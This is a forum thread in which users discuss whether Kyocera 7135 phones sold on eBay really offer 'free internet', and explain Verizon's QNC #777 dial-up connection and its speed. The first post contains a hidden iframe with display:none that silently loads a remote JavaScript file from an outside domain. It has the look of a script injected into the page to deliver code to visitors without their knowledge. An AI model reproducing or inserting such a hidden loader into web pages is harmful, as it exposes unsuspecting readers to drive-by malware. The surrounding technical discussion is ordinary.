+ Reply to Thread

EBAY--FREE Internet on your 7135???

Can anybody shed some light on this for me? The phones on ebay say that they come with instructions for free internet. Is this some trick of the trait that someone can go into detail on...

Please....:angel2

me so confused!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Live long and prosper...

More than likely they're just going to tell you how to get to the internet on your Verizon plan without signing up for Express Network. You don't need them to tell you how to do it.

It's not really free since it counts against your minutes to use the internet on your phone.

I have my 7135 on an America's Choice plan. I can go on the internet as well as check e-mail but it counts against my minutes. It's also slower than the potential speed for Express Network. I use it mostly on the weekends when I'm away from the regular computer and I have unlimited nights and weekends. I'm still paying for it.
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

Connection Speed?

So your just connecting to your regular ISP dial-up number, correct? Any idea what your connection speed is?

In the past I used my kyocera 3100 model for connecting my ipaq through a cable and the fastest I could get was a 9500k connection speed.

Can you get closer to a 56K connection speed with this tri-mode phone?

Live long and prosper...

You don't need an ISP, the connection is 14.4kbps. Basically your phone dials #777 and connects into Verizon's QNC network.

There are several threads on here that go into detail on how to set it up.
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

but if you get the express network and connect it to your Ipaq, you should be able to get speeds a lot greater then the 14.4 Search for posts on the express network. I think there is an qnc vs. express network thread that would conatin the info.